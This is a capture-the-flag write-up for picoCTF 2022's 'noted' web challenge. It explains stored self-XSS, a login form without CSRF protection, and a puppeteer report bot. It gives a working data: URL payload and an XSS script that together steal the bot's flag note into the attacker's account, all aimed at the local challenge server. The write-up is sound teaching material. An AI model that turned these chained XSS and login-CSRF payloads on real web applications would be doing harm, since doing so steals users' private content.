# Write up picoCTF 2022 - noted

## Introduction

Thank you to picoCTF and especially EHHTHING for creating this challenge.

## Challenge description analysis

Here is the challenge description:

>Title: **noted**

>I made a nice web app that lets you take notes. I'm pretty sure I've followed all the best practices so its definitely secure right? Note that the headless browser used for the "report" feature does not have access to the internet.

Note web applications are common challenges in CTF. Given the fact that in these applications user are free to write and upload what they want, one of the first vulnerability to check is XSS. If the notes are vulnerable to this kind of attack, it is very likely that it will be a stored XSS vulnerability considering that users can save their notes. 

One other element can lead you to think about exploiting an XSS vulnerability: the "report" feature. Information are given about the bot who is reviewing the reports, it is a headless browser with no internet connection. If we could find an XSS vulnerability and send it to the bot, we would be able to get information not accessible from our account.

The challenge also provides the website's code and a docker file to allow users running it in local and investigating the code to spot the vulnerability and craft the payload. However, before reading the code, we are going to setup the docker and explore the website.

## Local webserver setup

The first step is to setup the web-server in our local environment. To do so, I will use the Dockerfile given in the archive of the challenge. If you never built a docker image, I will explain how to do it. Create a new directory in which you will extract the archive:

```bash
mkdir picoctf2022_noted; cd picoctf2022_noted

wget https://gitlab.com/cursed.fra/picoctf-write-up/-/raw/main/picoctf2022/web/noted/noted.tar.gz; tar -xf noted.tar.gz
```

You will have a folder called *code* with the Dockerfile inside it. To build the docker, enter the following commands:

```bash
cd code

docker build -t "picoctf_noted:Dockerfile" .
```

Wait until everything is installed and enter the following command:

```bash
docker run -it -d -p 8080:8080 picoctf_noted:Dockerfile
```
The web-server will now run in a docker on port 8080. By default, the ip address range of docker is `172.17.0.0/24`. To access the website, enter `172.17.0.1:8080` in your web browser. When you want to stop the docker, just list the running docker, and copy the picoctf_noted container ID. You can now stop it with the ID.

```bash
docker ps

docker stop <CONTAINER_ID>
```

## Website exploration

When browsing to the note webapp, the first thing we get is a login form. There is a button to register, so I will create an account to test the note webapp. After registering, we are redirected to `/notes` in which all the notes are stored. We have two buttons: one to write a new note, and one to report. Before trying the report function, let's create a note.

![Note creation](screenshots/testnote.png "Note creation")

![Note creation](screenshots/testnote2.png "Note creation")

After creating the note, we are redirected to the `/notes` page which now has out test note. We can see that both the title and the body of the notes are displayed, so if we manage to find an XSS vulnerability, it will be stored in our `/notes` page. Let's try to trigger an XSS vulnerability. To do so, I just create a new note and try to alert the document's domain with this simple payload:

`<script> alert(window.domain) </script>`

![XSS test](screenshots/POCXSS.png "XSS test")

After creating it, the javascript code is executed and popup shows up: we have a stored XSS vulnerability. However, it is a self XSS vulnerability because the `/notes` content is linked to your account. We have to find a way to exploit this self XSS to get the flag.

![XSS test](screenshots/POCXSSpopup.png "XSS test")

Let's explore the report page. It is quite simple, we can provide a URL. We can't say much without seeing the code because when the URL is submitted, it just displays the message `URL has been reported.`

One last thing we can see on the website HTML source is that the login, new note and report pages all have forms, but the login is the only one which doesn't have CSRF tokens (if you are not familiar with CSRF token, here is an explanation: https://www.synopsys.com/glossary/what-is-csrf.html). Given the fact that logging in is a critical action, we can say that not having CSRF token for the login request is a misconfiguration. We will see later how we can use it to exploit the XSS vulnerability.

## Code review

From what we learnt in the website exploration, one important part necessary for the exploit we do not fully understand at the moment is the report function. Let's open the report.js file and try to understand how the bot is working.

```javascript
const crypto = require('crypto');
const puppeteer = require('puppeteer');

async function run(url) {
	let browser;

	try {
		module.exports.open = true;
		browser = await puppeteer.launch({
			headless: true,
			pipe: true,
			args: ['--incognito', '--no-sandbox', '--disable-setuid-sandbox'],
			slowMo: 10
		});

		let page = (await browser.pages())[0]

		await page.goto('http://0.0.0.0:8080/register');
		await page.type('[name="username"]', crypto.randomBytes(8).toString('hex'));
		await page.type('[name="password"]', crypto.randomBytes(8).toString('hex'));

		await Promise.all([
			page.click('[type="submit"]'),
			page.waitForNavigation({ waituntil: 'domcontentloaded' })
		]);

		await page.goto('http://0.0.0.0:8080/new');
		await page.type('[name="title"]', 'flag');
		await page.type('[name="content"]', process.env.FLAG ?? 'ctf{flag}');

		await Promise.all([
			page.click('[type="submit"]'),
			page.waitForNavigation({ waituntil: 'domcontentloaded' })
		]);

		await page.goto('about:blank')
		await page.goto(url);
		await page.waitForTimeout(7500);

		await browser.close();
	} catch(e) {
		console.error(e);
		try { await browser.close() } catch(e) {}
	}

	module.exports.open = false;
}

module.exports = { open: false, run }
```
So the bot is a puppeteer bot running a headless browser in incognito mode and without sandbox. There are basically 3 parts in the report function process. Firstly, an account is created by the bot by browsing to the register page, filling the form with a random username and password. After that, the bot creates a new note with the "flag" as title and the flag in the content. When the note is submitted, the bot goes to a blank page, and then access the URL given by the user. After 7.5 seconds, the browser closes. 

We have no way to guess the bot's account username and password, so the only way to exploit the bot is to use the url given to him.

## Creating the exploit

Let's recap. We have a stored self XSS vulnerability, a login form not protected by CSRF tokens and a puppeteer bot creating a note with the flag we want to get which then go to the URL we provide. The bot is also not supposed to have access to the internet (he in fact has, but I don't know if it was intentional or not so I preferred not using internet to solve the challenge).

To build the exploit I will use a feature in web browsers called "Data URL" (more info about it here: https://developer.mozilla.org/en-US/docs/Web/HTTP/Basics_of_HTTP/Data_URIs). As the name suggests, it allows you to enter data in the URL which will be rendered by the web browser. If you specify that the data is HTML, you can create a page with the HTML and the javascript content you need to exploit the vulnerabilities.

An idea to execute the self XSS payload on the bot could be making a form with our credential pre-filled sending a request to the webapp, with some javascript code sending it automatically. All of this is possible because the login form is not protected with CSRF tokens. After the login, the bot will be redirected to the `/notes` page on which the self XSS will be triggered. The only problem now is that we have to figure out how save the flag before the bot changes the account. 

For that, we are going to exploit the fact that the bot is using a headless browser. Some security measures in every day browser are not applied in these headless browser, one of these rules is the popup blocker. On the bot's headless browser, we can open new windows without worrying about them getting blocked. We can now adapt the javascript of the page we will send to the bot so that it opens his notes in another window, and then login to our account.

For the XSS payload, the idea is to copy the content of the bot's note which contains the flag, and write it in a new note given the fact that it will be connected to our account. It will be easy afterwards for us to retrieve the flag because it will be displayed in our notes.

One last thing before writing the payloads. If the XSS payload executes everytime we enter the note page, it will be annoying to read the flag after the bot writes it. To avoid that, we will write the XSS payload so that it only executes when the URL contains a certain string, `execute` for example. Thanks to that, it will not be executed everytime we enter the page, but only when we will send the bot to the URL `/notes?execute` so that it triggers the XSS for him. Because of this detail, we have to login in another window, otherwise the rest of the javascript code will not be executed after the bot logs in and he will be redirected to `/notes`, not `/notes?execute`. To do that, we add `target=_blank` which forces the page to open in a new window.

Let's write that payload:

```HTML

data:text/html,

<form action="http://0.0.0.0:8080/login" method="POST" id=sw target=_blank> 
<input value="temp" type="text" name="username"> <input value="temp" type="text" name="password">
</form>

<script>
window.open('http://0.0.0.0:8080/notes', 'flag');
setTimeout("sw.submit()", 500);
setTimeout("window.location='http://0.0.0.0:8080/notes?execute'", 1000);
</script>
```

This code will:

1. Make a button with our credentials prefilled
2. Open the bot's account notes which contains the flag in another window in a window called '*flag*'
3. Wait 500ms and login to our account in a new window.
4. Wait 1s and go to the `/notes?execute` page to trigger our self XSS payload. 

As this payload will be sent as a URL, we have to compress it in one line, which gives:

`data:text/html,<form action="http://0.0.0.0:8080/login" method="POST" id=sw target=_blank> <input value="temp" type="text" name="username"> <input value="temp" type="text" name="password"></form><script>window.open('http://0.0.0.0:8080/notes', 'flag');setTimeout("sw.submit()", 500);setTimeout("window.location='http://0.0.0.0:8080/notes?execute'", 1000);</script>`

Let's now write the XSS payload. When the bot triggers it, it has a window opened called 'flag' and is connected to our account. The goal will be to open the new note page in a new window (otherwise the script will not be fully executed), get the flag in the previously opened windows and writing it in the body of the note and submitting the new note. Here is how I did it:

```HTML
<script>
if(window.location.search.includes('execute')){
window.open("http://0.0.0.0:8080/new", "post");
setTimeout('window.open("", "post").document.getElementsByName("title")[0].value = "flag";window.open("", "post").document.getElementsByName("content")[0].value = window.open("", "flag").document.querySelector("p").innerText;window.open("", "post").document.forms[0].submit();', 500);
}
</script>
```
The last line is a bit compressed so I will explain it. After opening a new window called 'post', the last line wait for 500ms and then fills out all the information. 

- `window.open("", "post").document.getElementsByName("title")[0].value = "flag";`: in the window post, we set the value of the first element called title (i.e. the title form) to the string "flag"

- `window.open("", "post").document.getElementsByName("content")[0].value = window.open("", "flag").document.querySelector("p").innerText` : same idea here but it is the value of the note's content. To find the flag value in the bot's note page, I simulated the bot's actions and used the developer console in Firefox to get the right element (I will show it a bit later).

- `window.open("", "post").document.forms[0].submit();', 500)`: submits the form to create the note. 

Here is the bot's note page:

```HTML
<body>
<h1>My Notes</h1>
<hr>

<div>
	<h2>flag</h2>
	<p>ctf{flag}</p>
	<form action="/delete" method="POST">
		<input type="hidden" name="_csrf" value="yRryCQGg-tAQFv50s6c1qnEo81Le-x3KqSzg">
		<input type="hidden" name="id" value="1">
		<input type="submit" value="Delete">
	</form>
</div>
<hr>

<br>
<a href='/new'>New Note</a> | <a href='/report'>Report</a>
</body>
```
The flag is located in the first (and only) p tag of the page. I used the function `querySelector("p")` which selects the first p tag, and then `innerText` to get the flag string. 

![Bot note panel](screenshots/botflag.png "Bot note panel")

## Executing the exploit

Let's register a user with the credentials `temp:temp` and login. After that, create a note with the XSS payload. 

![Exploit part 1](screenshots/exploitstep1.png "Exploit part 1")

After creating it, we now report the data URL we created and we wait.

![Exploit part 2](screenshots/exploitstep2.png "Exploit part 2")

After 2 seconds, a new note should appear with the flag.

![Exploit part 3](screenshots/exploitstep3.png "Exploit part 3")












